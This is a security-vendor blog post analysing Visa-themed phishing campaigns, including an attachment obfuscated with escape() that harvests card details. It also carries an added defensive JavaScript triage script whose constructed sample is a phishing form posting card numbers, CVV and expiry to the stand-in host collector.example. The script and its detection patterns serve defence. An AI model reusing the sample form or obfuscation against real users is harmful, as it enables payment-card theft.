Phishing raids aiming at Visa® card holders multiply
Visa® card users have been the target of two major drive-by phishing campaigns over the weekend. While the first phishing wave only targets Visa® users located in France and relies on a forged login page hosted on a spoofed domain, the second scheme is much more elaborate and carefully planned.

In order to lure victims into filling in the form, the drive-by spam message they receive warns them that failure to comply with the request will lead to the automatic termination of the service and, subsequently, the deactivation of the card account. The cyber-criminals behind this kind of attack usually rely on users' fear of losing service to pressure them into disclosing sensitive details.
While the first phishing attempt abusing the Visa® brand is frequently encountered and relatively easy to stop (mostly by terminating the services of the Web site hosting the spoofed Web page), the following example is much more difficult to spot and block in time.
This specific phishing campaign also relies on drive-by spam in order to reach its victims. It is addressed to any Visa® user who would like to collect a $50 bonus in exchange for filling in an apparently harmless survey. Unlike average phishing attempts, this message does not include any Web links, which makes it less likely to be labeled as spam or to raise suspicion amongst its recipients. Instead, it comes with an alleged survey form attached as an HTML document - the actual phishing form.

Although the e-mail message is written in poor English (there are quite a few spelling errors and ambiguous sentences), which may tip the user off that it was not composed by Visa®, the HTML attachment is quite convincing and well protected against source-code analysis. When opened, the HTML page looks normal, with all of the form fields in place and ready to harvest sensitive details:
The first questions are typical of a survey and bring nothing to the remote attacker; they are there just to add extra legitimacy to the form. The second part of the survey, on the contrary, is quite interesting, since it is meant to steal users' personal information such as full name, full address and contact information. The last part of the alleged survey asks for the credit card number, verification number and expiration date - paired with the victim's address, these are the three key details that open the door to on-line shopping on the victim's behalf.
Should the victim happen to know HTML and prefer to see with their own eyes what happens when the Submit button is pressed, he / she will be presented with an obfuscated view of the page, as shown below:
The entire HTML page has been obfuscated with the JavaScript escape function in order to hide the inner workings of the form from average computer users. Since most modern browsers can run JavaScript (unless the user has explicitly limited its use), the page is decoded and rendered in real time as the victim opens it in their favorite browser. Digging past the obfuscation routine, the HTML code reveals that the form's content is actually posted to a PHP page hosted on a server belonging to the China Beijing Chinanet Shanghai Province Network.
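To show how a defender can triage such an attachment, here is an added example (not code from the original post or from Bitdefender) that decodes escape()-obfuscated markup the way a browser would and reports where the decoded form posts and which fields it collects. The sample attachment and the host collector.example are constructed placeholders.

```javascript
// Added example (not from the original post): a triage helper for HTML e-mail
// attachments that hide a form behind JavaScript escape(), as the Visa "survey"
// attachment does. Sample data is constructed; "collector.example" is a placeholder.

// Decode every unescape("...") literal in the attachment, as the browser would
// when it runs the embedded script, so the real markup can be inspected.
function deobfuscateEscapedHtml(source) {
  const call = /unescape\(\s*(['"])((?:\\.|(?!\1)[^\\])*)\1\s*\)/g;
  return source.replace(call, (_m, _q, body) => unescape(body));
}

// Pull form actions and input names from the decoded markup (regex-based;
// adequate for flat phishing forms, not a full HTML parser).
function extractFormFacts(html) {
  const actions = [...html.matchAll(/<form\b[^>]*\baction\s*=\s*["']?([^"'\s>]+)/gi)]
    .map(m => m[1]);
  const inputs = [...html.matchAll(/<input\b[^>]*\bname\s*=\s*["']?([^"'\s>]+)/gi)]
    .map(m => m[1].toLowerCase());
  return { actions, inputs };
}

// Field-name patterns for the three card details the survey asks for.
const CARD_FIELDS = [/card|ccnum/, /cvv|cvc|verification|security/, /exp/];

// Flag an attachment when at least two of the campaign's traits are present:
// obfuscated markup, a form posting to a remote PHP endpoint, card fields.
function assessAttachment(source) {
  const decoded = deobfuscateEscapedHtml(source);
  const { actions, inputs } = extractFormFacts(decoded);
  const reasons = [];
  if (decoded !== source) reasons.push('escape()-obfuscated markup');
  if (actions.some(a => /^https?:\/\//i.test(a) && /\.php(\?|$)/i.test(a)))
    reasons.push('form posts to remote PHP endpoint: ' + actions.join(', '));
  const hits = CARD_FIELDS.filter(re => inputs.some(n => re.test(n))).length;
  if (hits >= 2) reasons.push('collects payment-card fields: ' + inputs.join(', '));
  return { suspicious: reasons.length >= 2, reasons, actions, inputs };
}

// Constructed sample: the form only appears after the browser runs unescape().
const FORM_HTML = '<form method="post" action="http://collector.example/survey.php">' +
  '<input name="fullname"><input name="cardnumber"><input name="cvv2">' +
  '<input name="expdate"><input type="submit" value="Submit"></form>';
const SAMPLE_ATTACHMENT = '<html><body><script>document.write(unescape("' +
  escape(FORM_HTML) + '"))</script></body></html>';

console.log(assessAttachment(SAMPLE_ATTACHMENT));
```

The same check can be run over every HTML attachment at the mail gateway, where the decoded form action is also the indicator to block at the proxy.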
Unlike remotely-hosted phishing forms (which can be taken down by service providers as soon as they have been identified as malicious), attached forms are much more difficult to stop, since users always have them available as e-mail attachments.
In order to stay safe and protect the integrity of your account, never open attachments from unknown senders, especially when they appear to be sent on behalf of a financial institution. Most banks would contact their customers by phone and - if necessary - would invite them to the nearest branch if account modifications or updates are required.



Copyright 2011. Site powered by Bitdefender